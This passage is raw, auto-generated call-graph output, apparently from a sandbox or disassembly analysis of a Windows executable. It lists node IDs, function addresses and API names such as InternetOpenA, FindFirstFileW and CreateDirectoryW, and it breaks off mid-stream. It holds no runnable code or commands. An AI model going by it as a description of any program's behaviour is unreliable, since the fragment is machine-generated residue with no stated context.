42893->44237 44238 7ff643f47d80 50 API calls 4 library calls 42893->44238 44239 7ff643f48a60 50 API calls std::_Throw_Cpp_error 42893->44239 42894->42893 42895->42896 42897 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42896->42897 42897->42898 42899 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42898->42899 42899->42900 42903 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42900->42903 42901->42893 42902->42893 42903->42904 44247 7ff643f24dc0 54 API calls _com_raise_error 42904->44247 42908 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42906->42908 42907->42893 42908->42909 44248 7ff643f24dc0 54 API calls _com_raise_error 42909->44248 42914 7ff643f24d50 54 API calls 42912->42914 42913->42893 42914->42915 42916 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42915->42916 42916->42917 42919 7ff643f24d50 54 API calls 42917->42919 42918->42893 42919->42920 42923 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42920->42923 42921->42893 42922->42893 42923->42926 42924->42893 42929 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42926->42929 42928->42893 42929->42931 42933 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42930->42933 44249 7ff643f24c60 53 API calls 3 library calls 42931->44249 42936 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42932->42936 42933->42932 42938 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42934->42938 42936->42934 42939 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42937->42939 42938->42937 42939->42940 44250 7ff643f24c60 53 API calls 3 library calls 42940->44250 42941->42893 42943->42893 42944->42893 42945->42893 42946->42893 42950->42893 42951->42893 42953->42893 42954->42893 42955->42893 42956->42893 42957->42872 42960 7ff643f40922 42959->42960 42963 7ff643f408e3 memcpy_s 42959->42963 44350 7ff643f44fa0 50 API calls 6 library calls 42960->44350 42962 7ff643f40938 42962->42434 42963->42434 42965 7ff643f62a38 std::_Facet_Register 50 API calls 42964->42965 42966 7ff643f3ec3d 42965->42966 44351 7ff643f48af0 42966->44351 42968 7ff643f3ec63 42968->42434 42968->42968 42970 7ff643f62a38 std::_Facet_Register 50 API calls 42969->42970 42971 7ff643f31158 42970->42971 42972 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 42971->42972 42973 7ff643f31199 42972->42973 42974 7ff643f5e0b4 __std_fs_code_page 48 API calls 42973->42974 42975 7ff643f311b9 42974->42975 42976 7ff643f23ab0 52 API calls 42975->42976 42977 7ff643f311d7 42976->42977 42978 7ff643f255a0 66 API calls 42977->42978 42979 7ff643f311ef messages 42978->42979 42981 7ff643f320d7 42979->42981 42982 7ff643f5e0b4 __std_fs_code_page 48 API calls 42979->42982 43008 7ff643f312d1 messages 42979->43008 43069 7ff643f313c1 messages memcpy_s 42979->43069 42984 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42981->42984 42983 7ff643f31293 42982->42983 42988 7ff643f23ab0 52 API calls 42983->42988 42989 7ff643f320dd 42984->42989 42985 7ff643f3218e 44447 7ff643f24dc0 54 API calls _com_raise_error 42985->44447 42992 7ff643f312b1 42988->42992 44441 7ff643f24dc0 54 API calls _com_raise_error 42989->44441 42990 7ff643f3139d 44379 7ff643f405d0 42990->44379 42991 7ff643f321a7 44448 7ff643f22410 50 API calls std::_Throw_Cpp_error 42991->44448 44363 7ff643f25680 42992->44363 42994 7ff643f32128 43001 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42994->43001 42997 7ff643f32188 44446 7ff643f22410 50 API calls std::_Throw_Cpp_error 42997->44446 42998 7ff643f320f2 43007 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 42998->43007 43004 7ff643f3212e 43001->43004 43002 7ff643f3217c 43006 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43002->43006 43003 7ff643f321ad 44449 7ff643f22410 50 API calls std::_Throw_Cpp_error 43003->44449 44442 7ff643f22370 50 API calls 3 library calls 43004->44442 43005 7ff643f32182 43012 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43005->43012 43006->43005 43010 7ff643f320f8 43007->43010 43008->42989 43008->42998 44378 7ff643f46540 50 API calls 5 library calls 43008->44378 43009 7ff643f26190 121 API calls 43009->43069 43017 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43010->43017 43012->42997 43013 7ff643f3203b 43018 7ff643f3206d messages 43013->43018 43030 7ff643f320ba 43013->43030 43015 7ff643f320fe 43021 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43015->43021 43016 7ff643f32134 43028 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43016->43028 43017->43015 43020 7ff643f43ad0 47 API calls 43018->43020 43023 7ff643f3208d 43020->43023 43029 7ff643f32104 43021->43029 43022 7ff643f32176 43026 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43022->43026 43031 7ff643f62770 codecvt 8 API calls 43023->43031 43024 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 43024->43069 43025 7ff643f32170 44445 7ff643f22410 50 API calls std::_Throw_Cpp_error 43025->44445 43026->43002 43027 7ff643f460e0 50 API calls 43027->43069 43034 7ff643f3213a 43028->43034 43038 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43029->43038 43032 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43030->43032 43036 7ff643f3209f 43031->43036 43037 7ff643f320bf 43032->43037 43040 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43034->43040 43036->42434 44440 7ff643f24dc0 54 API calls _com_raise_error 43037->44440 43042 7ff643f3210a 43038->43042 43039 7ff643f408c0 50 API calls std::_Throw_Cpp_error 43039->43069 43043 7ff643f32140 43040->43043 43041 7ff643f405d0 50 API calls 43041->43069 43044 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43042->43044 44443 7ff643f22370 50 API calls 3 library calls 43043->44443 43045 7ff643f32110 43044->43045 43049 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43045->43049 43047 7ff643f26970 177 API calls 43047->43069 43048 7ff643f32146 43051 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43048->43051 43050 7ff643f32116 43049->43050 43054 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43050->43054 43053 7ff643f3214c 43051->43053 43052 7ff643f43880 50 API calls 43052->43069 43055 7ff643f24d50 54 API calls 43053->43055 43057 7ff643f3211c 43054->43057 43058 7ff643f32164 43055->43058 43056 7ff643f3216a 43059 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43056->43059 43062 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43057->43062 44444 7ff643f22410 50 API calls std::_Throw_Cpp_error 43058->44444 43059->43025 43063 7ff643f32122 43062->43063 43066 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43063->43066 43065 7ff643f62a38 50 API calls std::_Facet_Register 43065->43069 43066->42994 43067 7ff643f5e0b4 48 API calls __std_fs_code_page 43067->43069 43068 7ff643f23ab0 52 API calls 43068->43069 43069->42985 43069->42991 43069->42994 43069->42997 43069->43002 43069->43003 43069->43004 43069->43005 43069->43009 43069->43010 43069->43013 43069->43015 43069->43016 43069->43022 43069->43024 43069->43025 43069->43027 43069->43029 43069->43034 43069->43037 43069->43039 43069->43041 43069->43042 43069->43043 43069->43045 43069->43047 43069->43048 43069->43050 43069->43052 43069->43053 43069->43056 43069->43057 43069->43058 43069->43063 43069->43065 43069->43067 43069->43068 43071 7ff643f255a0 66 API calls 43069->43071 44387 7ff643f46540 50 API calls 5 library calls 43069->44387 44388 7ff643f406d0 43069->44388 44405 7ff643f28880 118 API calls 5 library calls 43069->44405 44406 7ff643f5e7c8 43069->44406 43071->43069 43073 7ff643f43b26 43072->43073 43074 7ff643f43aeb 43072->43074 44470 7ff643f47d20 47 API calls messages 43074->44470 43077 7ff643f43060 47 API calls 43076->43077 43078 7ff643f31008 43077->43078 43079 7ff643f43060 47 API calls 43078->43079 43080 7ff643f31014 43079->43080 43081 7ff643f40370 47 API calls 43080->43081 43082 7ff643f3101d 43081->43082 43083 7ff643f40370 47 API calls 43082->43083 43084 7ff643f31026 messages 43083->43084 43085 7ff643f3109f messages 43084->43085 43086 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43084->43086 43085->42434 43087 7ff643f310c5 43086->43087 43089 7ff643f44286 43088->43089 43092 7ff643f44186 43088->43092 44472 7ff643f22410 50 API calls std::_Throw_Cpp_error 43089->44472 43093 7ff643f44280 43092->43093 43094 7ff643f441ea 43092->43094 43095 7ff643f4423e 43092->43095 43100 7ff643f44191 memcpy_s 43092->43100 44471 7ff643f22370 50 API calls 3 library calls 43093->44471 43094->43093 43098 7ff643f62a38 std::_Facet_Register 50 API calls 43094->43098 43097 7ff643f62a38 std::_Facet_Register 50 API calls 43095->43097 43097->43100 43099 7ff643f441ff 43098->43099 43099->43100 43101 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43099->43101 43100->42250 43101->43093 43103 7ff643f261ae std::_Locinfo::_Locinfo_ctor 43102->43103 43104 7ff643f262f7 43103->43104 43105 7ff643f261f2 43103->43105 43112 7ff643f406d0 50 API calls 43104->43112 43120 7ff643f2624c messages 43104->43120 43106 7ff643f26756 43105->43106 43111 7ff643f460e0 50 API calls 43105->43111 44484 7ff643f22410 50 API calls std::_Throw_Cpp_error 43106->44484 43108 7ff643f26750 44483 7ff643f22410 50 API calls std::_Throw_Cpp_error 43108->44483 43110 7ff643f2675c 43115 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43110->43115 43114 7ff643f26234 43111->43114 43112->43120 43113 7ff643f460e0 50 API calls 43119 7ff643f26360 messages 43113->43119 43116 7ff643f408c0 std::_Throw_Cpp_error 50 API calls 43114->43116 43117 7ff643f26762 43115->43117 43116->43120 43122 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43117->43122 43118 7ff643f26768 43123 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43118->43123 43119->43108 43119->43118 43121 7ff643f460e0 50 API calls 43119->43121 43120->43108 43120->43110 43120->43113 43120->43117 43124 7ff643f263e1 messages 43121->43124 43122->43118 43125 7ff643f2676e 43123->43125 43124->43118 43126 7ff643f2641d InternetOpenA 43124->43126 44949 7ff643f2a810 43328->44949 43805->42434 43806->42434 43807->42434 45372 7ff643f59dc0 43808->45372 43810 7ff643f58e73 messages 43810->42434 43811->42434 43814 7ff643f3f50e 43812->43814 43815 7ff643f3f55a 43814->43815 43817 7ff643f3f52a memcpy_s 43814->43817 43819 7ff643f3f5b2 43814->43819 43824 7ff643f3f5ed 43814->43824 43818 7ff643f62a38 std::_Facet_Register 50 API calls 43815->43818 43825 7ff643f3f5e7 43815->43825 43817->42434 43822 7ff643f3f570 43818->43822 43820 7ff643f62a38 std::_Facet_Register 50 API calls 43819->43820 43820->43817 43822->43817 43823 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43822->43823 43823->43825 45377 7ff643f22410 50 API calls std::_Throw_Cpp_error 43824->45377 45376 7ff643f22370 50 API calls 3 library calls 43825->45376 43827 7ff643f446a5 messages 43826->43827 43828 7ff643f4470e 43826->43828 43827->43828 43829 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43827->43829 43828->42434 43830 7ff643f44723 43829->43830 43831->42434 43832->42434 43834 7ff643f40381 43833->43834 43836 7ff643f4038a messages 43833->43836 43835 7ff643f446a0 47 API calls 43834->43835 43835->43836 43836->42434 43843->42231 43850 7ff643f6362a 43849->43850 43850->42479 43850->43850 43852 7ff643f41de8 43851->43852 43857 7ff643f45b90 43852->43857 43854 7ff643f41e34 43873 7ff643f41160 43854->43873 43856 7ff643f41e3c 43856->42483 43858 7ff643f45bc1 43857->43858 43859 7ff643f41160 10 API calls 43858->43859 43860 7ff643f45bd6 43858->43860 43859->43860 43861 7ff643f45ca8 43860->43861 43863 7ff643f45cdd 43860->43863 43864 7ff643f45cb9 43861->43864 43888 7ff643f412c0 RtlPcToFileHeader RaiseException _com_raise_error 43861->43888 43889 7ff643f649c0 RtlPcToFileHeader RaiseException 43863->43889 43864->43854 43866 7ff643f45d30 43867 7ff643f4652f 43866->43867 43868 7ff643f462f3 43866->43868 43903 7ff643f5eec4 50 API calls 2 library calls 43867->43903 43890 7ff643f40e30 43868->43890 43872 7ff643f4632a std::_Locinfo::_Locinfo_ctor 43872->43854 43874 7ff643f4119e 43873->43874 43881 7ff643f41220 43873->43881 43905 7ff643f3f970 10 API calls 43874->43905 43876 7ff643f62770 codecvt 8 API calls 43878 7ff643f4124e 43876->43878 43877 7ff643f411ab 43879 7ff643f4120d 43877->43879 43882 7ff643f41263 43877->43882 43878->43856 43879->43881 43906 7ff643f412c0 RtlPcToFileHeader RaiseException _com_raise_error 43879->43906 43881->43876 43907 7ff643f649c0 RtlPcToFileHeader RaiseException 43882->43907 43884 7ff643f41309 43884->43856 43885 7ff643f412b6 43885->43884 43908 7ff643f649c0 RtlPcToFileHeader RaiseException 43885->43908 43887 7ff643f41360 43888->43864 43889->43866 43891 7ff643f40e5c 43890->43891 43893 7ff643f40efb messages 43890->43893 43892 7ff643f40f62 43891->43892 43895 7ff643f40e81 43891->43895 43896 7ff643f40eb7 43891->43896 43897 7ff643f40e8e 43891->43897 43904 7ff643f22370 50 API calls 3 library calls 43892->43904 43893->43872 43895->43893 43900 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 43895->43900 43898 7ff643f62a38 std::_Facet_Register 50 API calls 43896->43898 43897->43892 43899 7ff643f40e9b 43897->43899 43898->43895 43901 7ff643f62a38 std::_Facet_Register 50 API calls 43899->43901 43902 7ff643f40f6d 43900->43902 43901->43895 43904->43895 43905->43877 43906->43881 43907->43885 43908->43887 43909->42502 43910->42507 43911->42511 43912->42517 43914 7ff643f5eae4 std::_Lockit::_Lockit 6 API calls 43913->43914 43915 7ff643f47310 43914->43915 43916 7ff643f5eae4 std::_Lockit::_Lockit 6 API calls 43915->43916 43921 7ff643f4735f 43915->43921 43918 7ff643f47335 43916->43918 43917 7ff643f473ac 43919 7ff643f5eb5c std::_Lockit::~_Lockit LeaveCriticalSection 43917->43919 43922 7ff643f5eb5c std::_Lockit::~_Lockit LeaveCriticalSection 43918->43922 43920 7ff643f473f0 43919->43920 43923 7ff643f62770 codecvt 8 API calls 43920->43923 43921->43917 43942 7ff643f23130 87 API calls 7 library calls 43921->43942 43922->43921 43924 7ff643f422d3 43923->43924 43932 7ff643f45710 43924->43932 43926 7ff643f473be 43927 7ff643f473c4 43926->43927 43928 7ff643f47413 43926->43928 43943 7ff643f5f08c 50 API calls std::_Facet_Register 43927->43943 43944 7ff643f22bf0 50 API calls 3 library calls 43928->43944 43931 7ff643f47418 43934 7ff643f45741 43932->43934 43933 7ff643f45756 43936 7ff643f4582f 43933->43936 43939 7ff643f45864 43933->43939 43934->43933 43935 7ff643f41160 10 API calls 43934->43935 43935->43933 43937 7ff643f42313 43936->43937 43945 7ff643f412c0 RtlPcToFileHeader RaiseException _com_raise_error 43936->43945 43937->42524 43946 7ff643f649c0 RtlPcToFileHeader RaiseException 43939->43946 43941 7ff643f458b7 43942->43926 43943->43917 43944->43931 43945->43937 43946->43941 43947->42535 43989 7ff643f3ee10 43948->43989 43951 7ff643f3ee10 50 API calls 43952 7ff643f429ef 43951->43952 43953 7ff643f3ee10 50 API calls 43952->43953 43954 7ff643f429fd 43953->43954 43955 7ff643f3ee10 50 API calls 43954->43955 43956 7ff643f42a0b 43955->43956 43957 7ff643f3ec10 50 API calls 43956->43957 43958 7ff643f42a19 43957->43958 43959 7ff643f3ee10 50 API calls 43958->43959 43960 7ff643f42a27 43959->43960 43961 7ff643f3ee10 50 API calls 43960->43961 43962 7ff643f42a47 43961->43962 43963 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 43962->43963 43964 7ff643f42a5b 43963->43964 43965 7ff643f3ee10 50 API calls 43964->43965 43966 7ff643f42a84 43965->43966 43967 7ff643f3ee10 50 API calls 43966->43967 43968 7ff643f42a95 43967->43968 43969 7ff643f3ee10 50 API calls 43968->43969 43970 7ff643f42aa6 43969->43970 43971 7ff643f3ee10 50 API calls 43970->43971 43972 7ff643f42ab7 43971->43972 43973 7ff643f3ee10 50 API calls 43972->43973 43974 7ff643f42acb 43973->43974 43975 7ff643f3ec10 50 API calls 43974->43975 43976 7ff643f42adf 43975->43976 43977 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 43976->43977 43978 7ff643f42af3 43977->43978 43979 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 43978->43979 43980 7ff643f42b20 43979->43980 43981 7ff643f3ec10 50 API calls 43980->43981 43982 7ff643f42b34 43981->43982 43983 7ff643f3ec10 50 API calls 43982->43983 43984 7ff643f42b48 43983->43984 43985 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 43984->43985 43986 7ff643f42b8f 43985->43986 43987 7ff643f3ee10 50 API calls 43986->43987 43988 7ff643f42994 43987->43988 43988->42544 43990 7ff643f3ee4e 43989->43990 43996 7ff643f3eea8 43989->43996 43999 7ff643f45e60 50 API calls 3 library calls 43990->43999 43991 7ff643f62770 codecvt 8 API calls 43993 7ff643f3eebc 43991->43993 43993->43951 43994 7ff643f3ee9d 43995 7ff643f446a0 47 API calls 43994->43995 43995->43996 43996->43991 43997 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 43998 7ff643f3ee53 43997->43998 43998->43994 43998->43997 43999->43998 44001->42567 44002->42576 44003->42678 44010 7ff643f5ea08 QueryPerformanceFrequency 44005->44010 44007 7ff643f239e2 44011 7ff643f5e9ec QueryPerformanceCounter 44007->44011 44009 7ff643f239ea 44009->42720 44010->44007 44011->44009 44065 7ff643f71824 44012->44065 44015 7ff643f5e0c6 AreFileApisANSI 44016 7ff643f27cf3 44015->44016 44017 7ff643f23ab0 44016->44017 44018 7ff643f23bda 44017->44018 44019 7ff643f23b04 44017->44019 44032 7ff643f255a0 44018->44032 44020 7ff643f23c00 44019->44020 44075 7ff643f5e0dc MultiByteToWideChar GetLastError 44019->44075 44079 7ff643f22800 50 API calls 2 library calls 44020->44079 44023 7ff643f23c06 44080 7ff643f22b80 50 API calls _com_raise_error 44023->44080 44025 7ff643f23b2a 44025->44023 44027 7ff643f23b45 44025->44027 44076 7ff643f44730 50 API calls 6 library calls 44025->44076 44077 7ff643f5e0dc MultiByteToWideChar GetLastError 44027->44077 44030 7ff643f23bcf 44030->44018 44078 7ff643f22b80 50 API calls _com_raise_error 44030->44078 44033 7ff643f255d1 44032->44033 44081 7ff643f5e440 44033->44081 44036 7ff643f62770 codecvt 8 API calls 44037 7ff643f25672 44036->44037 44037->42747 44037->42754 44039 7ff643f24ebf 44038->44039 44043 7ff643f24e57 44038->44043 44041 7ff643f5e440 66 API calls 44039->44041 44040 7ff643f62770 codecvt 8 API calls 44042 7ff643f24f6d 44040->44042 44041->44043 44042->42811 44043->44040 44047 7ff643f24fb0 44044->44047 44046 7ff643f24ff4 44049 7ff643f62770 codecvt 8 API calls 44046->44049 44047->44046 44048 7ff643f24fe7 44047->44048 44130 7ff643f5e38c FindNextFileW 44047->44130 44133 7ff643f25270 50 API calls 2 library calls 44048->44133 44050 7ff643f25046 44049->44050 44050->42811 44052->42811 44053->42811 44054->42766 44055->42765 44057 7ff643f24d69 44056->44057 44058 7ff643f3f4a0 50 API calls 44057->44058 44059 7ff643f24d7e 44058->44059 44134 7ff643f24660 44059->44134 44061 7ff643f24da0 44144 7ff643f649c0 RtlPcToFileHeader RaiseException 44061->44144 44063 7ff643f24db1 44066 7ff643f76f84 _Getctype 47 API calls 44065->44066 44067 7ff643f7182d 44066->44067 44070 7ff643f79788 44067->44070 44071 7ff643f7979d 44070->44071 44072 7ff643f5e0bd 44070->44072 44071->44072 44074 7ff643f8348c 47 API calls 3 library calls 44071->44074 44072->44015 44072->44016 44074->44072 44075->44025 44076->44027 44077->44030 44079->44023 44082 7ff643f5e482 44081->44082 44084 7ff643f5e4e3 GetFileAttributesExW 44082->44084 44092 7ff643f5e548 44082->44092 44093 7ff643f5e48b 44082->44093 44083 7ff643f62770 codecvt 8 API calls 44085 7ff643f255ed 44083->44085 44087 7ff643f5e4f7 GetLastError 44084->44087 44084->44092 44085->44036 44091 7ff643f5e506 FindFirstFileW 44087->44091 44087->44093 44089 7ff643f5e5e6 44095 7ff643f5e693 44089->44095 44096 7ff643f5e5f5 GetFileInformationByHandleEx 44089->44096 44090 7ff643f5e5c6 44090->44093 44094 7ff643f5e5d1 CloseHandle 44090->44094 44097 7ff643f5e51a GetLastError 44091->44097 44098 7ff643f5e525 FindClose 44091->44098 44092->44093 44123 7ff643f5e770 CreateFileW 44092->44123 44093->44083 44094->44093 44099 7ff643f5e755 44094->44099 44100 7ff643f5e6e8 44095->44100 44101 7ff643f5e6ae GetFileInformationByHandleEx 44095->44101 44102 7ff643f5e635 44096->44102 44103 7ff643f5e60f GetLastError 44096->44103 44097->44093 44098->44092 44126 7ff643f71774 47 API calls 2 library calls 44099->44126 44107 7ff643f5e73b 44100->44107 44108 7ff643f5e6ff 44100->44108 44101->44100 44105 7ff643f5e6c4 GetLastError 44101->44105 44102->44095 44113 7ff643f5e656 GetFileInformationByHandleEx 44102->44113 44103->44093 44106 7ff643f5e61d CloseHandle 44103->44106 44105->44093 44110 7ff643f5e6d6 CloseHandle 44105->44110 44106->44093 44111 7ff643f5e766 44106->44111 44107->44093 44114 7ff643f5e741 CloseHandle 44107->44114 44108->44093 44112 7ff643f5e705 CloseHandle 44108->44112 44109 7ff643f5e75a 44127 7ff643f71774 47 API calls 2 library calls 44109->44127 44115 7ff643f5e691 44110->44115 44116 7ff643f5e760 44110->44116 44129 7ff643f71774 47 API calls 2 library calls 44111->44129 44112->44093 44112->44099 44113->44095 44118 7ff643f5e672 GetLastError 44113->44118 44114->44093 44114->44099 44115->44093 44128 7ff643f71774 47 API calls 2 library calls 44116->44128 44118->44093 44122 7ff643f5e680 CloseHandle 44118->44122 44122->44109 44122->44115 44124 7ff643f5e5c0 44123->44124 44125 7ff643f5e7b2 GetLastError 44123->44125 44124->44089 44124->44090 44125->44124 44131 7ff643f5e39a 44130->44131 44132 7ff643f5e3a1 GetLastError 44130->44132 44131->44047 44133->44046 44145 7ff643f22590 44134->44145 44136 7ff643f24688 44161 7ff643f3f080 44136->44161 44138 7ff643f2469f 44175 7ff643f24790 51 API calls 6 library calls 44138->44175 44140 7ff643f2475c messages 44140->44061 44141 7ff643f24722 44141->44140 44142 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44141->44142 44143 7ff643f24771 44142->44143 44143->44061 44144->44063 44146 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 44145->44146 44147 7ff643f225bb 44146->44147 44148 7ff643f225e2 44147->44148 44149 7ff643f408c0 std::_Throw_Cpp_error 50 API calls 44147->44149 44176 7ff643f22a30 44148->44176 44149->44148 44151 7ff643f408c0 std::_Throw_Cpp_error 50 API calls 44152 7ff643f2261f messages 44151->44152 44154 7ff643f22701 44152->44154 44183 7ff643f22430 48 API calls 2 library calls 44152->44183 44156 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44154->44156 44155 7ff643f226d3 messages 44155->44136 44159 7ff643f22707 messages __std_exception_destroy 44156->44159 44157 7ff643f2269f 44157->44155 44158 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44157->44158 44158->44154 44159->44136 44162 7ff643f3f0ae 44161->44162 44165 7ff643f3f19d 44162->44165 44167 7ff643f3f0ca memcpy_s 44162->44167 44168 7ff643f3f13d 44162->44168 44169 7ff643f3f164 44162->44169 44171 7ff643f3f1a3 44162->44171 44188 7ff643f22370 50 API calls 3 library calls 44165->44188 44167->44138 44168->44165 44172 7ff643f62a38 std::_Facet_Register 50 API calls 44168->44172 44170 7ff643f62a38 std::_Facet_Register 50 API calls 44169->44170 44170->44167 44189 7ff643f22410 50 API calls std::_Throw_Cpp_error 44171->44189 44173 7ff643f3f14e 44172->44173 44173->44167 44174 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44173->44174 44174->44165 44175->44141 44184 7ff643f5df9c GetLocaleInfoEx 44176->44184 44179 7ff643f444a0 std::_Throw_Cpp_error 50 API calls 44180 7ff643f22a9c LocalFree 44179->44180 44181 7ff643f62770 codecvt 8 API calls 44180->44181 44182 7ff643f22600 44181->44182 44182->44151 44183->44157 44185 7ff643f5dfcc FormatMessageA 44184->44185 44187 7ff643f22a65 44185->44187 44187->44179 44188->44171 44191 7ff643f4002a 44190->44191 44192 7ff643f3ffda 44190->44192 44191->42893 44251 7ff643f3fdd0 44192->44251 44194 7ff643f40014 44261 7ff643f68fe0 44194->44261 44309 7ff643f5e3ac 44196->44309 44198 7ff643f487f6 messages 44198->42893 44200 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44201 7ff643f4881b 44200->44201 44201->42893 44203 7ff643f478ed 44202->44203 44211 7ff643f47b60 44202->44211 44204 7ff643f47923 44203->44204 44206 7ff643f47b5b 44203->44206 44210 7ff643f4795d 44203->44210 44212 7ff643f47999 44203->44212 44213 7ff643f47970 44203->44213 44209 7ff643f62a38 std::_Facet_Register 50 API calls 44204->44209 44331 7ff643f22370 50 API calls 3 library calls 44206->44331 44207 7ff643f47b66 44214 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44207->44214 44209->44210 44210->44207 44316 7ff643f48ff0 44210->44316 44332 7ff643f462a0 50 API calls 2 library calls 44211->44332 44215 7ff643f62a38 std::_Facet_Register 50 API calls 44212->44215 44213->44204 44213->44206 44217 7ff643f47b6c 44214->44217 44215->44210 44231->42893 44232->42893 44234 7ff643f57b12 44233->44234 44235 7ff643f58e50 50 API calls 44234->44235 44236 7ff643f57b1d 44235->44236 44236->42893 44237->42893 44238->42893 44239->42893 44246->42892 44249->42930 44250->42881 44252 7ff643f3fdf3 44251->44252 44253 7ff643f3fea2 44251->44253 44252->44253 44259 7ff643f3fdfd 44252->44259 44254 7ff643f62770 codecvt 8 API calls 44253->44254 44255 7ff643f3feb1 44254->44255 44255->44194 44256 7ff643f3fe41 44257 7ff643f62770 codecvt 8 API calls 44256->44257 44258 7ff643f3fe5e 44257->44258 44258->44194 44259->44256 44269 7ff643f69c48 44259->44269 44262 7ff643f69010 44261->44262 44270 7ff643f69c78 44269->44270 44277 7ff643f69998 44270->44277 44310 7ff643f5e3b6 FindClose 44309->44310 44311 7ff643f487c2 44309->44311 44310->44311 44312 7ff643f5e3c5 44310->44312 44311->44198 44311->44200 44315 7ff643f71774 47 API calls 2 library calls 44312->44315 44317 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 44316->44317 44318 7ff643f4900a 44317->44318 44319 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 44318->44319 44320 7ff643f49018 44319->44320 44321 7ff643f3ee10 50 API calls 44320->44321 44331->44211 44332->44207 44350->42962 44352 7ff643f48b22 44351->44352 44362 7ff643f48bae 44351->44362 44353 7ff643f62a38 std::_Facet_Register 50 API calls 44352->44353 44354 7ff643f48b3a 44353->44354 44355 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 44354->44355 44356 7ff643f48b57 44355->44356 44357 7ff643f3f4e0 std::_Throw_Cpp_error 50 API calls 44356->44357 44358 7ff643f48b65 44357->44358 44359 7ff643f48af0 50 API calls 44358->44359 44360 7ff643f48b9c 44359->44360 44361 7ff643f48af0 50 API calls 44360->44361 44361->44362 44362->42968 44364 7ff643f256d5 44363->44364 44371 7ff643f256b9 messages 44363->44371 44368 7ff643f2570f 44364->44368 44460 7ff643f43b40 50 API calls 6 library calls 44364->44460 44366 7ff643f62770 codecvt 8 API calls 44367 7ff643f258c2 44366->44367 44367->43008 44450 7ff643f3efc0 44368->44450 44370 7ff643f25856 44370->44371 44372 7ff643f258db 44370->44372 44371->44366 44373 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44372->44373 44374 7ff643f258e0 44373->44374 44375 7ff643f257a9 44375->44370 44376 7ff643f3efc0 50 API calls 44375->44376 44455 7ff643f5e314 CreateDirectoryW 44375->44455 44376->44375 44378->42990 44380 7ff643f406c8 44379->44380 44381 7ff643f405f6 44379->44381 44463 7ff643f41520 50 API calls 44380->44463 44386 7ff643f40609 memcpy_s 44381->44386 44462 7ff643f44c40 50 API calls 6 library calls 44381->44462 44385 7ff643f406b7 44385->43069 44386->43069 44387->43069 44389 7ff643f40717 44388->44389 44394 7ff643f406ed memcpy_s 44388->44394 44390 7ff643f40819 44389->44390 44395 7ff643f4072a 44389->44395 44464 7ff643f22410 50 API calls std::_Throw_Cpp_error 44390->44464 44391 7ff643f4077e 44396 7ff643f62a38 std::_Facet_Register 50 API calls 44391->44396 44393 7ff643f4081e 44465 7ff643f22370 50 API calls 3 library calls 44393->44465 44394->43069 44395->44391 44397 7ff643f407ad 44395->44397 44398 7ff643f40771 44395->44398 44402 7ff643f40763 memcpy_s 44395->44402 44396->44402 44400 7ff643f62a38 std::_Facet_Register 50 API calls 44397->44400 44398->44391 44398->44393 44400->44402 44401 7ff643f6cd30 _invalid_parameter_noinfo_noreturn 47 API calls 44404 7ff643f4082a 44401->44404 44402->44401 44403 7ff643f407fb messages 44402->44403 44403->43069 44405->43069 44407 7ff643f5e770 